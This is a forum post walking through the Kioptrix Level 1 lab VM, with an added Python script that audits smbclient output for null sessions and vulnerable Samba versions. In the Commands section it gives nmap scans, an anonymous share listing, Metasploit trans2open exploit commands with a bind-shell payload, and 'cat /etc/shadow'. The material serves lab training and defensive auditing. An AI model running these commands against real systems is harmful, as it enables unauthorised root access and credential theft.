Thread: [Video] Kioptrix - Level 1 (Samba)

  1. #1
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    [Video] Kioptrix - Level 1 (Samba)

    Links
    Watch video on-line: http://blip.tv/file/4924035
    Download video: http://www.mediafire.com/?7rsj1agn28aounc


    Brief Overview
    Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a Samba weakness, which is a quick attack that goes straight to root.


    Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Detect network shares (smbclient)
    * Exploit samba weakness, Trans2open (Metasploit)
    * Game Over


    What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5: 4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5: 8DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * smbclient – (Can be found on BackTrack 4-R2). Download here
    * metasploit – (Can be found on BackTrack 4-R2). Download here



    Walkthrough
    A quick general nmap scan shows which hosts are currently on the network, before a more detailed scan is run against the target (192.168.0.111). The detailed scan shows which services (ports) the target has running and their versions, and then attempts to identify the operating system (OS). The results are:
    * OS: Linux v2.4.x (2.4.9-18)
    * Samba: Samba smbd (workgroup: MYGROUP)


    The next stage was to check that Samba was functioning correctly. Using smbclient, the attacker lists all services which are available on the target. The result being:
    * Anonymous login
    * Hostname (KIOPTRIX)
    * Workgroup (MYGROUP)
    * Default hidden admin shares (IPC$, ADMIN$)

    The attacker then starts up Metasploit and searches for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.
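    From the defender's side, the two results above (an anonymous smbclient listing and a Samba banner) are exactly what an internal audit should be looking for. The script below is an added example for this write-up, not g0tmi1k's code: it parses a `smbclient -L <host> -N` transcript into the banner fields and the share/server/workgroup tables, then reports whether a null session was accepted, whether hidden admin shares are enumerable anonymously, and whether the advertised Samba version falls in the 2.2.x-before-2.2.8a range that trans2open was fixed in. The listing in `SAMPLE_LISTING` is constructed, and the `Samba 2.2.1a` banner is an assumption, since the post only shows "Samba smbd (workgroup: MYGROUP)".

```python
"""Audit helper: parse `smbclient -L <host> -N` output and flag null-session exposure.

Added example for this write-up, not g0tmi1k's code. SAMPLE_LISTING is a
constructed transcript shaped like classic smbclient output (banner line,
share table, server table, workgroup table). The "Samba 2.2.1a" version string
is an assumption: the post only reports "Samba smbd (workgroup: MYGROUP)".
"""
import re

SAMPLE_LISTING = """\
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

\tSharename      Type      Comment
\t---------      ----      -------
\tIPC$           IPC       IPC Service (Samba Server)
\tADMIN$         Disk      IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

\tServer               Comment
\t---------            -------
\tKIOPTRIX             Samba Server

\tWorkgroup            Master
\t---------            -------
\tMYGROUP              KIOPTRIX
"""

BANNER_RE = re.compile(r"Domain=\[(?P<domain>[^\]]*)\] OS=\[[^\]]*\] Server=\[(?P<server>[^\]]*)\]")
VERSION_RE = re.compile(r"Samba\s+(\d+)\.(\d+)\.(\d+)([a-z]?)")


def parse_listing(text):
    """Return the anonymous flag, banner fields and the three tables smbclient prints."""
    info = {"anonymous": False, "domain": None, "server": None,
            "shares": [], "servers": [], "workgroups": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            section = None            # a blank line ends the current table
            continue
        if line.startswith("Anonymous login successful"):
            info["anonymous"] = True  # the -N (no password) login was accepted
            continue
        m = BANNER_RE.search(line)
        if m:
            info["domain"], info["server"] = m.group("domain"), m.group("server")
            continue
        fields = re.split(r"\s{2,}", line)   # columns are separated by runs of spaces
        head = fields[0]
        if head in ("Sharename", "Server", "Workgroup"):
            section = head
            continue
        if set(head) == {"-"}:        # dashed underline row
            continue
        if section == "Sharename" and len(fields) >= 2:
            comment = fields[2] if len(fields) > 2 else ""
            info["shares"].append((fields[0], fields[1], comment))
        elif section == "Server":
            info["servers"].append(head)
        elif section == "Workgroup" and len(fields) >= 2:
            info["workgroups"].append((fields[0], fields[1]))
    return info


def samba_version(server_banner):
    """'Samba 2.2.1a' -> (2, 2, 1, 'a'); None when the banner is not Samba's."""
    m = VERSION_RE.search(server_banner or "")
    return None if m is None else (int(m[1]), int(m[2]), int(m[3]), m[4])


def trans2open_exposed(version):
    """True for Samba 2.2.x releases before 2.2.8a, the range the trans2open
    overflow was fixed in (a fact about the bug, not something the post states).
    Other branches are not assessed here."""
    if version is None or version[:2] != (2, 2):
        return False
    return version[2:] < (8, "a")


def assess(info):
    """Turn the parsed listing into defender-facing findings."""
    findings = []
    if info["anonymous"]:
        findings.append("null session accepted: share and server lists readable without credentials")
    hidden = [name for name, _, _ in info["shares"] if name.endswith("$")]
    if info["anonymous"] and hidden:
        findings.append("hidden admin shares enumerable anonymously: " + ", ".join(hidden))
    if trans2open_exposed(samba_version(info["server"])):
        findings.append("banner '%s' is in the trans2open-affected 2.2.x range; upgrade Samba" % info["server"])
    return findings


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    print("host(s):", parsed["servers"], "workgroup:", parsed["domain"])
    for finding in assess(parsed):
        print("-", finding)
```

    Feed it the saved output of the same `smbclient -L` command the post uses; a host that produces no findings either refused the null session or advertises a Samba outside the 2.2.x range, which is the state an internal share audit wants to see.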


    Commands
    Code:
    start-network
    dhclient eth0
    clear
    
    nmap 192.168.0.* -n -sn -sP
    nmap 192.168.0.111 -T4 -O -sV -sS   #-sC -A -p- -v
    
    #nmblookup -A 192.168.0.111       # Hostname
    smbclient -L \\192.168.0.111 -N   # What services are available on a server
    clear
    
    msfconsole
    search samba
    use linux/samba/trans2open
    #info
    show options
    set RHOST 192.168.0.111
    show options
    exploit
    #msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E    #PAYLOAD=linux/x86/shell_bind_tcp
    
    id
    uname -a
    cat /etc/shadow
    cat /etc/issue

    Notes
    Song: Gershon Kingsley - Pop Corn
    Video length: 02:18
    Capture length: 03:11
    Blog Post: http://g0tmi1k.blogspot.com/2011/03/...l-1-samba.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38997-%5Bvideo%5D-kioptrix-level-1-samba.html#post192416
    Last edited by g0tmi1k; 03-27-2011 at 07:58 PM.
